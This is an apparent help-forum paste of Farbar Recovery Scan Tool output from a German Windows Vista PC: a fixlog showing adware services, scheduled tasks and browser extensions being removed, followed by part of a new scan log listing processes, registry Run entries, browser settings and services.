HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{F2413FFA-9DCC-48B3-A09A-625F44D7FA96} => value deleted successfully.
"HKCR\CLSID\{F2413FFA-9DCC-48B3-A09A-625F44D7FA96}" => Key not found.
Firefox Proxy settings were reset.
Firefox Proxy settings were reset.
Firefox Proxy settings were reset.
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found] => not found.
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] => not found.
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] => not found.
FF Extension: No Name - tylerkeith11@aol.com [Not Found] => not found.
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] => not found.
compilerehtraceProt.exe => Service deleted successfully.
evrtspkgBckp.exe => Service deleted successfully.
FrozenGNUThumbnail.exe => Service deleted successfully.
FrozenSambaWindows.exe => Service deleted successfully.
C:\ProgramData\ZorkoKcesd => Moved successfully.
C:\Windows\system32\utilitylocalspl_86 => Moved successfully.
C:\Windows\system32\scrollingwin32Prot => Moved successfully.
C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A} => Moved successfully.
C:\ProgramData\EedtaWbezm => Moved successfully.
C:\ProgramData\UUdb => Moved successfully.
C:\Windows\Tasks\XPGILDE.job => Moved successfully.
C:\Windows\Tasks\MQZDOUD.job => Moved successfully.
C:\Users\finja\remove.exe => Moved successfully.
C:\Users\finja\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Users\finja\AppData\Local\Temp\sqlite3.dll => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} -" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1045E6B6-E707-475F-97CD-571E06C36511}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1045E6B6-E707-475F-97CD-571E06C36511}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-4" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{12725841-0DB7-461B-94D5-8A90F6589009}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12725841-0DB7-461B-94D5-8A90F6589009}" => Key deleted successfully.
C:\Windows\System32\Tasks\GoogleUpdater => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdater" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1EB9CADD-2506-46E7-96AD-5CBB99CAD30C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EB9CADD-2506-46E7-96AD-5CBB99CAD30C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9038396b-6856-4ead-9ee7-1215f651f0aa" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{26928486-85D4-43D1-846F-D5189AE90D56}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{26928486-85D4-43D1-846F-D5189AE90D56}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{33B6F316-29F5-4DEA-A8CC-B9249563A4AB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{33B6F316-29F5-4DEA-A8CC-B9249563A4AB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-11" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3738576E-1797-480B-AB26-9BECD9BC9AB1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3738576E-1797-480B-AB26-9BECD9BC9AB1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-4" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4BF96ACD-C54D-472D-BD3D-8C4495786051}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4BF96ACD-C54D-472D-BD3D-8C4495786051}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{50B6DF40-8A74-4768-B9E7-44B068036A93}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{50B6DF40-8A74-4768-B9E7-44B068036A93}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-3" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{521C87B6-4ECD-45FA-A21F-0987123DD4C6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{521C87B6-4ECD-45FA-A21F-0987123DD4C6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\afbfdcf4-7553-4735-ab81-4373cca9a051-6" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{547E6824-355F-4AC3-8FBC-7E4FBF25D3EF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{547E6824-355F-4AC3-8FBC-7E4FBF25D3EF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{665589FE-FED9-450D-8CAC-BCD6A34E666E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{665589FE-FED9-450D-8CAC-BCD6A34E666E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-2" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6ED78F91-0AE2-43BA-8C76-47269CF7A210}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6ED78F91-0AE2-43BA-8C76-47269CF7A210}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{793BBF80-2488-4871-8D11-6A461B28C8DE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{793BBF80-2488-4871-8D11-6A461B28C8DE}" => Key deleted successfully.
C:\Windows\System32\Tasks\MQZDOUD => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MQZDOUD" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7BC36AEC-816F-4BC2-93E6-9836D38AAD73}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BC36AEC-816F-4BC2-93E6-9836D38AAD73}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-1" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{88A4BAC1-045F-4DEC-B932-AEFCD853FCBB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88A4BAC1-045F-4DEC-B932-AEFCD853FCBB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-11" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8C6325F8-822B-4446-8F5E-79B27AA3A5D0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C6325F8-822B-4446-8F5E-79B27AA3A5D0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-5_user" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{928B2F3B-2C64-4AED-9F1B-93315F01FBDC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{928B2F3B-2C64-4AED-9F1B-93315F01FBDC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\afbfdcf4-7553-4735-ab81-4373cca9a051-7" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{99F31AC3-75A5-427A-A9A1-F7B67F954F82}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99F31AC3-75A5-427A-A9A1-F7B67F954F82}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-1" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A983A371-8E43-4C81-AB3D-1793E6C729DD}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A983A371-8E43-4C81-AB3D-1793E6C729DD}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{ADB99999-9CE5-4C49-8F93-40086B7A25B0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ADB99999-9CE5-4C49-8F93-40086B7A25B0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\afbfdcf4-7553-4735-ab81-4373cca9a051-11" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B07D5064-3E65-4825-82D2-D8ABAFA800DB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B07D5064-3E65-4825-82D2-D8ABAFA800DB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B31760E5-4C25-4B17-AA41-19EBAB4B5530}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B31760E5-4C25-4B17-AA41-19EBAB4B5530}" => Key deleted successfully.
C:\Windows\System32\Tasks\XPGILDE => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\XPGILDE" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CD87FD16-CBAA-439E-97ED-F35F08A43569}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD87FD16-CBAA-439E-97ED-F35F08A43569}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-5" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D577D774-768A-41F6-807D-4B88E2B8F71A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D577D774-768A-41F6-807D-4B88E2B8F71A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E911148E-9670-41D8-BAE6-AB49D00F4C5E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E911148E-9670-41D8-BAE6-AB49D00F4C5E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EAA78C2F-DE4A-448D-B187-69456B16B48A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EAA78C2F-DE4A-448D-B187-69456B16B48A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-5" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F6739869-2927-42C5-B8E3-6A24E4A7A5A4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F6739869-2927-42C5-B8E3-6A24E4A7A5A4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-2" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB314ECF-96F0-41DC-8CC2-C2561140CB57}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB314ECF-96F0-41DC-8CC2-C2561140CB57}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6" => Key deleted successfully.
C:\Windows\Tasks\MQZDOUD.job not found.
C:\Windows\Tasks\XPGILDE.job not found.
C:\ProgramData\TEMP => ":373E1720" ADS removed successfully.
C:\ProgramData\TEMP => ":9E22BBE8" ADS removed successfully.
EmptyTemp: => Removed 969.7 MB temporary data.
The system needed a reboot.
==== End of Fixlog ====
FRST Logfile: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 06-12-2014 02 Ran by finja (administrator) on FINJA-PC on 06-12-2014 17:43:30 Running from C:\Users\finja\Desktop Loaded Profile: finja (Available profiles: finja) Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: Deutsch (Deutschland) Internet Explorer Version 9 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (Microsoft Corporation) C:\Windows\System32\SLsvc.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe (Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe (Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe (Microsoft Corporation) C:\Windows\ehome\ehtray.exe (Intel Corporation) C:\Windows\System32\igfxsrvc.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbam.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE (1und1 Mail und Media GmbH) C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe (Microsoft Corporation) C:\Windows\ehome\ehmsas.exe (Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 10.0\Reader\reader_sl.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe (Intel Corporation) C:\Windows\System32\GfxUI.exe (Microsoft Corporation) C:\Windows\System32\conime.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Corporation) HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [768520 2008-07-25] (Dritek System Inc.) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [159744 2007-07-21] (Alps Electric Co., Ltd.) HKLM\...\Run: [WarReg_PopUp] => C:\Program Files\eMachines\WR_PopUp\WarReg_PopUp.exe [49152 2008-05-09] (eMachines) HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation) HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation) HKLM\...\Run: [MailCheck IE Broker] => C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2135104 2014-11-17] (1und1 Mail und Media GmbH) HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Corporation) HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://suche.web.de/webhp?src=br_startpage_ie StartMenuInternet: IEXPLORE.EXE - iexplore.exe SearchScopes: HKLM -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW SearchScopes: HKU\.DEFAULT -> {31BB071C-45F4-4DAD-BF5E-AD495B3B2FC8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> DefaultScope {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation) BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH) DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation) Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation) Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH) Tcpip\Parameters: [DhcpNameServer] 192.168.179.1 FireFox: ======== FF ProfilePath: C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.) FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\webssearches.xml FF Extension: 06997db0c0274d5fbd37b0d9230226ea - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea} [2014-11-06] FF Extension: Microsoft .NET Framework Assistant - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2014-11-04] FF Extension: PriceFountain - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{b6a94784-0ffb-4121-88c6-435139067ee2}.xpi [2014-11-06] FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-16] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found] FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found] FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found] FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] FF Extension: No Name - tylerkeith11@aol.com [Not Found] FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] FF StartMenuInternet: FIREFOX.EXE - firefox.exe Chrome: ======= CHR StartMenuInternet: Google Chrome - chrome.exe ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed] R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2007-01-17] (Hewlett-Packard Company) [File not signed] R2 MBAMScheduler; C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation) R2 MBAMService; 